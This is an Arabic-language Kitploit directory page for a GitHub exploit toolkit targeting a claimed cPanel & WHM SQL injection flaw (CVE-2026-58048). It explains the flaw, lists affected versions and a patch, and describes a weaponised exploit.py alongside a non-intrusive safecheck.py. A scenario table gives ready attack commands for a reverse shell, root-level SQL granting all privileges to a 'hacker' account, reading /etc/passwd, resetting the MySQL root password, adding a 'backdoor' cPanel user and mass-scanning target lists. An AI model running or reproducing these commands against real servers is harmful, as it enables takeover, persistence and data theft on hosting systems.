Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-58048-PoC-Exploit — 👾 CVE-2026-58048 – مجموعة أدوات تنفيذ SQL بصلاحيات الجذر في cPanel (CVSS 9.4) | مجموعة أدوات متكاملة للفريقين الأحمر والأزرق لإصدارات cPanel & WHM 11.x غير المُرقّعة. أداتان: الفاحص الآمن (التدقيق/إعداد التقارير)، والأداة المسلّحة (reverse shell، الاستمرارية، UDF RCE، النشر، قراءة/كتابة الملفات، عمليات قاعدة البيانات، الفحص الشامل). مع Python. 🦾 استخدمها بأخلاقية، والتزم بالقانون <3 | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-58048-poc-exploit
الاستطلاعماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالفريق الأحمرالاستجابة للحوادث

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
أمن قواعد البيانات
GitHubtc4dy/cve-2026-58048-poc-exploit

CVE-2026-58048-PoC-Exploit

عرض المستودع
525منذ شهر واحدلم تتم المراجعة بعد

حول

👾 CVE-2026-58048 – مجموعة أدوات تنفيذ SQL بصلاحيات الجذر في cPanel (CVSS 9.4) | مجموعة أدوات متكاملة للفريقين الأحمر والأزرق لإصدارات cPanel & WHM 11.x غير المُرقّعة. أداتان: الفاحص الآمن (التدقيق/إعداد التقارير)، والأداة المسلّحة (reverse shell، الاستمرارية، UDF RCE، النشر، قراءة/كتابة الملفات، عمليات قاعدة البيانات، الفحص الشامل). مع Python. 🦾 استخدمها بأخلاقية، والتزم بالقانون <3

مشاركة

CVEPoC

💥 CVE‑2026‑58048 – مجموعة أدوات تنفيذ SQL بصلاحيات root في cPanel

Python 3.8+ CVSS Author cPanel

⚠️ للاستخدام الأخلاقي فقط – اختبار أمني مصرح به
يوفر هذا المستودع أدوات لمتخصصي الأمن المصرح لهم، والفرق الزرقاء، ومختبري الاختراق فقط.
الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني بموجب CFAA (الولايات المتحدة)، وقانون إساءة استخدام الحاسوب (المملكة المتحدة)، وTCK 243/244 (تركيا)، وقوانين مماثلة في جميع أنحاء العالم.


📖 نظرة عامة على الثغرة

CVE‑2026‑58048 هي ثغرة حقن SQL حرجة في إصدارات cPanel & WHM 11.x تسمح لمستخدم cPanel موثّق بتنفيذ أوامر SQL عشوائية بصلاحيات MySQL root عبر وظيفة إعادة تسمية قاعدة البيانات.

كيف تعمل

  1. يتطلب وصولاً موثّقاً – يجب أن يمتلك المهاجم حساب cPanel صالحاً (اسم مستخدم/كلمة مرور) على الخادم المستهدف.
  2. التلاعب بوضع SQL – يستغل الاستغلال جلسة MySQL لتعيين الوضع إلى ANSI_QUOTES، مما يغيّر سلوك التحليل.
  3. حقن إعادة تسمية قاعدة البيانات – عند إعادة تسمية قاعدة بيانات، لا يتم تعقيم الاسم الجديد بشكل صحيح، مما يسمح للمهاجم بحقن عبارات SQL عشوائية.
  4. صلاحيات root – لأن عملية إعادة التسمية تعمل بصلاحيات MySQL root، يتم تنفيذ SQL المحقون بأعلى صلاحيات قاعدة البيانات.
  5. التأثير – السيطرة الكاملة على قاعدة البيانات، ورفع الصلاحيات، واختراق الخادم، وسرقة البيانات، والأبواب الخلفية، والتحرك الجانبي. قم بالترقية فوراً!

الإصدارات المتأثرة

  • cPanel & WHM 11.110 وما قبلها – معرّضة للثغرة
  • 11.111 – 11.118 – معرّضة للثغرة
  • 11.119 – 11.126 – معرّضة للثغرة
  • 11.127 – 11.134 – معرّضة للثغرة
  • 11.135 – 11.136 – معرّضة للثغرة
  • 11.137.x – معرّضة للثغرة إذا كانت أقل من 11.137.1.6
  • 11.138.1.6 وما بعدها – مُرقّعة

الترقيع

  • قم بالترقية إلى cPanel & WHM 11.138.1.6 أو أحدث.
  • إذا لم تكن الترقية ممكنة، عطّل عمليات إعادة تسمية MySQL لمستخدمي cPanel كحل مؤقت.

🧰 الأدوات

الأداةالغرضالمستخدم المستهدف
exploit.pyمجموعة أدوات مسلّحة كاملة مع reverse shell، والاستمرارية، وUDF RCE، وقراءة/كتابة الملفات، وعمليات قاعدة البيانات، ودعم البروكسي، والمسح الجماعي.الفرق الحمراء / مختبري الاختراق المصرح لهم

📊 مقارنة الميزات


🎯 ملخص حالات الاستخدام


⚙️ التثبيت

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
colorama
pymysql

📋 المعاملات

معاملات exploit.py

معاملات safecheck.py


💥 السيناريوهات


🧪 استخدام نقاط النهاية وAPI

يستخدم الاستغلال نقاط نهاية cPanel UAPI التالية:


🛡️ الاستخدام المسؤول

  • استخدم هذه الأدوات فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
  • الوصول غير المصرح به غير قانوني وغير أخلاقي.
  • المؤلفون غير مسؤولين عن أي إساءة استخدام.
  • اتبع دائماً قوانين ولوائح بلدك.

يُقدَّم هذا البرنامج لأغراض تعليمية واختبار أمني مصرح به فقط.

تنزيل الأداة
safecheck.py
فاحص ثغرات غير تدخّلي يكتشف إصدار cPanel ويقيّم المخاطر دون تنفيذ أي حمولة خبيثة. يُنشئ تقارير مفصّلة.
الفرق الزرقاء / مدقّقي الأمن
الميزةexploit.pysafecheck.py
اكتشاف الثغرة✅✅
اكتشاف الإصدار✅✅
حقن SQL بصلاحيات MySQL root✅❌
Reverse shell✅❌
الاستمرارية (إنشاء مستخدم cPanel)✅❌
UDF RCE (تنفيذ الأوامر)✅❌
قراءة/كتابة الملفات✅❌
عمليات قاعدة البيانات (أي SQL)✅❌
دعم البروكسي✅✅
المسح الجماعي (متعدد الخيوط)✅❌
صدفة تفاعلية✅❌
وضع غير تدخّلي (آمن)❌✅
وضع Verbose/Debug✅✅
التحكم في التحقق من SSL✅✅
User‑Agent مخصص✅✅
تأخير الطلبات / إعادة المحاولات✅❌
إخراج JSON / تقرير✅✅
فحص إمكانية الوصول إلى نقطة النهاية❌✅
اكتشاف تسرب وضع SQL❌✅
السيناريوالأداة الموصى بها
الفريق الأزرق – التحقق مما إذا كان تثبيت cPanel الخاص بك معرّضاً للثغرةsafecheck.py
التدقيق الأمني – تقييم ثغرات غير تدخّليsafecheck.py
الفريق الأحمر – اختبار اختراق مصرح به مع استغلال كاملexploit.py
Bug Bounty – اختبار الإفصاح المسؤولsafecheck.py
المسح الجماعي – فحص أهداف متعددة بحثاً عن الثغرةexploit.py (الكشف فقط)
الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقةsafecheck.py
المعاملالوصف
-t, --targetعنوان URL المستهدف لـ cPanel (مثال: https://cpanel.example.com:2083)
-l, --target-fileملف يحتوي على قائمة الأهداف (واحد في كل سطر) للمسح الجماعي
-u, --mysql-userاسم مستخدم cPanel/MySQL
-P, --mysql-passكلمة مرور cPanel/MySQL
--mysql-portمنفذ MySQL (الافتراضي: 3306)
-p, --portتجاوز منفذ cPanel (الافتراضي من URL أو 2083)
--threadsعدد الخيوط للأهداف المتعددة (الافتراضي: 10)
-o, --outputحفظ النتائج في ملف (هدف واحد)
--logملف سجل للإخراج المفصّل
-v, --verboseإخراج مفصّل
--proxyبروكسي HTTP/HTTPS (مثال: http://127.0.0.1:8080)
-ua, --user-agentUser‑Agent مخصص
--no-keep-aliveعدم إبقاء الجلسة نشطة
--delayالتأخير بين الطلبات (الافتراضي: 2.0s)
--max-retriesالحد الأقصى لإعادة المحاولات (الافتراضي: 3)
--ssl-verifyالتحقق من شهادات SSL
--cmdالأمر المراد تنفيذه (بادئة sql: أو udf: للتحديد)
--injectSQL مخصص للحقن (يتجاوز الإجراءات الأخرى)
--reverse-shellIP:PORT للـ reverse shell (يستخدم UDF)
--passwdتغيير كلمة مرور MySQL root
--adduserإنشاء مستخدم cPanel (USER DOMAIN PASSWORD)
--readقراءة ملف عبر LOAD_FILE
-i, --interactiveصدفة تفاعلية بعد الاستغلال
--verifyالتحقق من نجاح الاستغلال بمحاولة تسجيل الدخول إلى MySQL
--pingفحص الهدف قبل الاستغلال
المعاملالوصف
-t, --targetعنوان URL المستهدف لـ cPanel (مثال: https://cpanel.example.com:2083)
-v, --verboseإخراج مفصّل
--proxyبروكسي HTTP/HTTPS (مثال: http://127.0.0.1:8080)
-ua, --user-agentUser‑Agent مخصص
--ssl-verifyالتحقق من شهادات SSL
--timeoutمهلة الطلب بالثواني (الافتراضي: 10)
--logحفظ التقرير في ملف
--jsonإخراج النتائج بصيغة JSON
#السيناريوالأمر
1فحص سريع للثغرةpython safecheck.py -t https://cpanel.example.com:2083
2فحص مفصّل مع تقريرpython safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v
3Reverse shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4تنفيذ SQL مخصص (root)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'"
5قراءة ملف حساسpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6تغيير كلمة مرور MySQL rootpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7إنشاء مستخدم cPanel جديد (الاستمرارية)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8صدفة تفاعلية بعد الاستغلالpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9المسح الجماعي من ملفpython exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json
10استخدام بروكسي وUser‑Agent مخصصpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)"
نقطة النهايةالغرض
/execute/Mysql/create_databaseإنشاء قاعدة بيانات مؤقتة
/execute/Mysql/delete_databaseتنظيف قواعد البيانات المُنشأة
/execute/Mysql/rename_databaseنقطة النهاية المعرّضة للثغرة – تُفعّل حقن SQL
/execute/Version/get_versionالمصادقة والتحقق من الإصدار
/execute/UserManager/create_userإنشاء مستخدم cPanel جديد (الاستمرارية)
/execute/UserManager/list_usersسرد المستخدمين الحاليين